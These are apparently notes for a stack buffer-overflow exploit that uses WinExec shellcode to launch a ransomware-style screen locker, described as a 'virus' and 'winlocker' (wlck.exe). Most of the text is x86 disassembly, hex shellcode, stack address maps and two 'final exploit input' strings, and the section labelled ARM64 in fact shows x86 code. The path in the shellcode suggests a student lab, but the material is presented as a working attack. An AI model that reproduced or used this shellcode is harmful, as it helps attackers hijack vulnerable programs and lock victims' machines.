Here you will see the methods of launching the virus. Each 4 symbols are packed into one stack frame. 


WINDOWS NON-ARM64 CPU INSTRUCTIONS

These instructions start wlck.exe in the same directory, where the main.exe is started.
                              
CPU Disasm
Address   Hex dump          Command                                  Comments
00401001      83C4 80       ADD ESP,-80
00401004      31C0          XOR EAX,EAX
00401006      50            PUSH EAX
00401007      68 65222020   PUSH 20202265
0040100C      68 6B2E6578   PUSH 78652E6B
00401011      68 5C776C63   PUSH 636C775C
00401016      68 666C6F77   PUSH 776F6C66
0040101B      68 4F766572   PUSH 7265764F
00401020      68 66666572   PUSH 72656666
00401025      68 705C4275   PUSH 75425C70
0040102A      68 736B746F   PUSH 6F746B73
0040102F      68 745C4465   PUSH 65445C74
00401034      68 7564656E   PUSH 6E656475
00401039      68 735C7374   PUSH 74735C73
0040103E      68 55736572   PUSH 72657355
00401043      68 22433A5C   PUSH 5C3A4322
00401048      89E3          MOV EBX,ESP
0040104A      40            INC EAX
0040104B      50            PUSH EAX
0040104C      53            PUSH EBX
0040104D      B8 8039AD76   MOV EAX,76AD3980
00401052      FFD0          CALL EAX




HEX CODE: 83C48031C0506865222020686B2E6578685C776C6368666C6F77684F766572686666657268705C427568736B746F68745C4465687564656E68735C737468557365726822433A5C89E3405053B8 XX XX XX XX FFD0E8FE1900

13119612849192801041013432321041074610112010492119108991041021081111191047911810111410410210210111410411292661171041151071161111041169268101104
117100101110104115921151161048511510111410434675892137227648083184 X X X       |X 255 208 <> 232 254 25 \0

xxxx = 128 57 122 117


The ascii representation below:
This code launches winlocker using WinExec

_____________________________________________________________________________________________________________________________________________________________________________
    0019FEE8   |    0019FEEC   |   0019FEF0   |   0019FEF4   |   0019FEF8     |  0019FEFC     |  0019FF00    |  0019FF04      | 0019FF08      |  0019FF0C   | 0019FF10      |
131 196 128 49 | 192 80 104 101| 34 32 32 104 |107 46 101 120|104 92 119 108  | 99 104 102 108|111 119 104 79|118 101 114 104 |102 102 101 114|104 112 92 66|117 104 115 107|
_______________|_______________|______________|______________|________________|_______________|______________|________________|_______________|_____________|_______________|
___________________________________________________________________________________________________________________________________________________________________________
   0019FF14    |  0019FF18   |   0019FF1C    |   0019FF20    |   0019FF24   |    0019FF28    |  0019FF2C    |   0019FF30    |   0019FF34    |   0019FF38    |   0019FF3C   |
116 111 104 116|92 68 101 104|117 100 101 110|104 115 92 115 |116 104 85 115|101 114 104 34  | 67 58 92 137 | 227 64 80 83  |  184 X X X    | x 255 208 A   | 232 254 25 0 |
_______________|_____________|_______________|_______________|______________|________________|______________|_______________|_______________|_______________|______________|
    ESP+4                                                                                                                                                                                                                                                                                                    ^------^                          EBP
                                                                                                                                                                                                                                                                                                              &WinExec

The final exploit input: â─Ç1└Phk"  h"wlcëŃPSŞxxxx đaaaaa∟ ↓

                           												  
WINDOWS ARM64 CPU INSTRUCTIONS

These instructions start wlck.exe in the same directory, where the main.exe is started.

83c4 80      add esp,-80
33c0         xor eax,eax
50           push eax
68 4c202d53  push 532d204c
68 6b22202d  push 2d20226b
68 22776c63  push 636c7722
8bdc         mov ebx,esp
50           push eax
53           push ebx
b8 xxxxxxx   mov eax,WinExec
ffd0         call eax

HEX CODE: 83 C4 80 33 C0 50 68 4C 20 2D 53 68 6B 22 20 2D 68 22 77 6C 63 8B DC 50 53 B8 XX XX XX XX FF D0
                                                                                        ^---------^
                                                                                          &WinExec

The ascii representation below:

This code launches winlocker using WinExec with -l and -s

________________________________________________________________________________________________________________________________________
    0019FE74   |   0019FE78    |   0019FE7C   |  0019FE80    |   0019FE84     |   0019FE88    |   0019FE8C | 0019FE90    |  0019FE94    |
131 196 128 51 | 192 80 104 76 | 32 45 83 104 | 107 34 32 45 | 104 34 119 108 | 99 139 220 80 | 83 184 x x | x x 255 208 | 116 254 25 0 |
_______________|_______________|______________|______________|________________|_______________|____________|_____________|______________|
    ESP+4                                                                                              ^-------^               EBP
                                                                                                        &WinExec

The final exploit input: â─Ç3└PhL -Shk" -h"wlcő▄PSŞxxxx đt■↓



